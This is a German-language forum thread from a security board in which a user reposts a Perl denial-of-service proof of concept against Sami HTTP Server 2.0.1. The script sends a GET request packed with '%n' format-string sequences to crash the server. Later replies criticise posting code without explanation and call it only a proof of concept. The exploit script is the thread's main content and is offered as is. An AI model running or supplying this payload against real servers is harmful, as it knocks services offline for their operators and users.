myGully.com

myGully.com (https://mygully.com/index.php)
-   Sicherheit & Anonymität (https://mygully.com/forumdisplay.php?f=65)
-   -   Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit (https://mygully.com/showthread.php?t=2159862)

GoodDay 10.11.10 23:33

Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
 
Code:

#!/usr/bin/perl
# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: [Link nur für registrierte und freigeschaltete Mitglieder sichtbar. Jetzt registrieren...]
# Tested on: Windows XP SP3
# Type: DOS/POC
 
 
use IO::Socket;
 
$target = "127.0.0.1";
$port  = 80;
 
$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";
 
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
 
$sock->send($payload);
 
close($sock);


gosha16 11.11.10 13:52

Und hast du jetz irgend eine Frage dazu? Oder wolltest du einfach bloß IRGENDWAS posten?

GoodDay 11.11.10 19:22

Irgendwas? Naja, eher ein Exploit.
Dieser Thread wurde [Link nur für registrierte und freigeschaltete Mitglieder sichtbar. Jetzt registrieren...] verlinkt, solltest du dir vielleicht mal durchlesen. :)

spartan-b292 11.11.10 21:36

Einen Codeschnipsel, der noch dazu von jemand anderem ist, posten kann jeder, beschreiben wie er funktioniert und was er macht, da gehört schon ein bischen mehr dazu.:rolleyes: Außerdem handelt es sich dabei laut der Website des Autors nur um ein Proof of Concept.

GoodDay 11.11.10 21:59

LESEN:
Zitat:

GET Request Denial of Service Exploit
Es ist ein HTTP DoS Exploit, simpler gehts kaum.


Alle Zeitangaben in WEZ +1. Es ist jetzt 07:55 Uhr.

Powered by vBulletin® (Deutsch)
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.